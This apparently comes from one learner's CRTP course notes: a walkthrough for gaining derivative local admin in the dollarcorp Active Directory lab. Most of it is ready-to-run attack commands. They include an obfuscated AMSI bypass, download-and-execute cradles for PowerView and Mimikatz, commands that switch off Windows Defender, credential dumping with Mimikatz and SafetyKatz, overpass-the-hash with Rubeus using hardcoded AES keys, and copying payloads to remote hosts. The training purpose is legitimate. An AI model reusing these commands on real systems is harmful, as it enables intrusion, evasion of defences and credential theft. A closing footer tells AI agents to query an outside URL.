# Obj 7 Derivative Local Admin

{% hint style="success" %}
Theses commands are going to be ran from the reverse shell on dcorp-ci
{% endhint %}

## Run AMSI bypass on machine

```
S`eT-It`em ( 'V'+'aR' +  'IA' + ('blE:1'+'q2')  + ('uZ'+'x')  ) ( [TYpE](  "{1}{0}"-F'F','rE'  ) )  ;    (    Get-varI`A`BLE  ( ('1Q'+'2U')  +'zX'  )  -VaL  )."A`ss`Embly"."GET`TY`Pe"((  "{6}{3}{1}{4}{2}{0}{5}" -f('Uti'+'l'),'A',('Am'+'si'),('.Man'+'age'+'men'+'t.'),('u'+'to'+'mation.'),'s',('Syst'+'em')  ) )."g`etf`iElD"(  ( "{0}{2}{1}" -f('a'+'msi'),'d',('I'+'nitF'+'aile')  ),(  "{2}{4}{0}{1}{3}" -f ('S'+'tat'),'i',('Non'+'Publ'+'i'),'c','c,'  ))."sE`T`VaLUE"(  ${n`ULl},${t`RuE} )
```

## Load PowerView onto the machine

```
iex ((New-Object Net.WebClient).DownloadString('http://172.16.100.X/PowerView.ps1'))
```

## Find Domain user location

```
Find-DomainUserLocation 
```

{% hint style="success" %}
The above command finds active sessions of domain users. We are looking for a DA session if possible.
{% endhint %}

## Check if we can run commands on the sessions available

```
Invoke-Command -ScriptBlock {whoami;hostname} -ComputerName dcorp-mgmt
```

## Get Mimikatz on the Target Machine

```
iex (iwr http://172.16.100.X/Invoke-Mimikatz.ps1-UseBasicParsing)
```

## Create a new session for Target Machine

```
$sess = New-PSSession -ComputerName dcorp-mgmt.dollarcorp.moneycorp.local
```

## Disable Protections and AMSI on Target Machine

```
Invoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess
```

## Now we can Invoke Mimikatz on Target Machine to Get Creds

```
Invoke-command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sess
```

## Now we can use Over Pass the Hash with Rubeus

We can use Rubeus, Mimikatz or SafteyKatz for this as well.&#x20;

## Rubeus Over Pass The Hash

```
C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
```

## Mimikatz Over Pass The Hash

```
Invoke-Mimikatz -Command '"sekurlsa::pth /user:svcadmin /domain:dollarcorp.moneycorp.local /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /run:powershell.exe"'
```

## SafetyKatz Over Pass The Hash

```
C:\AD\Tools\SafetyKatz.exe "sekurlsa::pth /user:srvadmin /domain:dollarcorp.moneycorp.local /aes256:145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4 /run:cmd.exe" "exit"
```

## <mark style="color:orange;">- DERIVATIVE LOCAL ADMIN -</mark>

In the session we created using svcadmin creds above we are going to see who we can access as local admin.

```
.C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess
```

## We can start a PSSession on any available machines we find

```
Enter-PSSession -ComputerName dcorp-adminsrv
```

## We need to check what language mode we are in first.

```
$ExecutionContext.SessionState.LanguageMode
```

## Next we can check the AppLocker policy to see if/where we can run scripts from

```
Get-AppLockerPolicy -Effective | select -ExpandProperty RuleCollections
```

## We can now disable Windows Defender and AMSI on the sess

```
Set-MpPreference -DisableRealtimeMonitoring $true -Verbose
Set-MpPreference -DisableIOAVProtection $true -Verbose
```

## Create a Modified Mimikatz script to execute on load

```
Create a copy of Invoke-Mimikatz.ps1 and rename it to Invoke-MimikatzEx.ps1.
-Open Invoke-MimikatzEx.ps1 in PowerShell ISE
-Add  Invoke-Mimikatz–Command sekurlsa::ekeys -to the very end of the file.
```

## Now we can transfer the new file over

We are copying this from our foothold machine in the process created for svcadmin

<pre><code><strong>PS C:\AD\Tools> Copy-Item C:\AD\Tools\Invoke-MimikatzEx.ps1 \\dcorp-adminsrv.dollarcorp.moneycorp.local\c$\'Program Files'
</strong></code></pre>

## Back on the Target Machine we can invoke Mimikatz

```
[dcorp-adminsrv]: PS C:\Program Files> .\Invoke-MimikatzEx.ps1
```

## Over Pass the Hash with SafetyKatz

Again we can use SafetyKatz, Rubeus or Mimikatz to do this also. We will use one of the creds we found in the previous hash dump.

```
C:\AD\Tools\SafetyKatz.exe "sekurlsa::pth /user:srvadmin /domain:dollarcorp.moneycorp.local /aes256:145019659e1da3fb150ed94d510eb770276cfbd0cbd834a4ac331f2effe1dbb4 /run:cmd.exe" "exit"
```

## On the new process that started we run invishell and look for PSRemoting local admins again.

```
. C:\AD\Tools\Find-PSRemotingLocalAdminAccess.ps1
Find-PSRemotingLocalAdminAccess -Verbose
```

## Extract credentials from our findings Using SafetyKatz

We can use mimikatz to do this but this time we are going to use safetykatz. So we need to copy loader.exe to the target machine first.

```
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-mgmt\C$\Users\Public\Loader.exe
```

## We can now winrs or PSRemote in and Invoke SafetyKatz

```
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe sekurlsa::ekeys exit
```

## We can do the same as above with Mimikatz do dump the credentials of the target machine

1. First we need to disable AMSI on the target machine (copy and past AMSI Bypass)
2. Download and Execute Mimikatz.ps1\
   `iex (iwr http://172.16.100.X/Invoke-Mimikatz.ps1-UseBasicParsing)`&#x20;
3. On Target machine run:\
   `Invoke-Mimikatz–Command '"sekurlsa::ekeys"'`<br>

## We can also dump credentials from the credentials vault with mimikatz

```
Invoke-Mimikatz -Command '"token::elevate" "vault::cred /patch"'
```

## Finally we can use Over Pass the Hash with svcadmin credentials to start a new process as Domain Admin

```
C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show/ptt
```


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ali3nw3rx-1.gitbook.io/ali3nw3rx-1/education/courses/paid-courses/pentester-academy/crtp/crtp-step-by-step-in-objectives/obj-7-derivative-local-admin.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.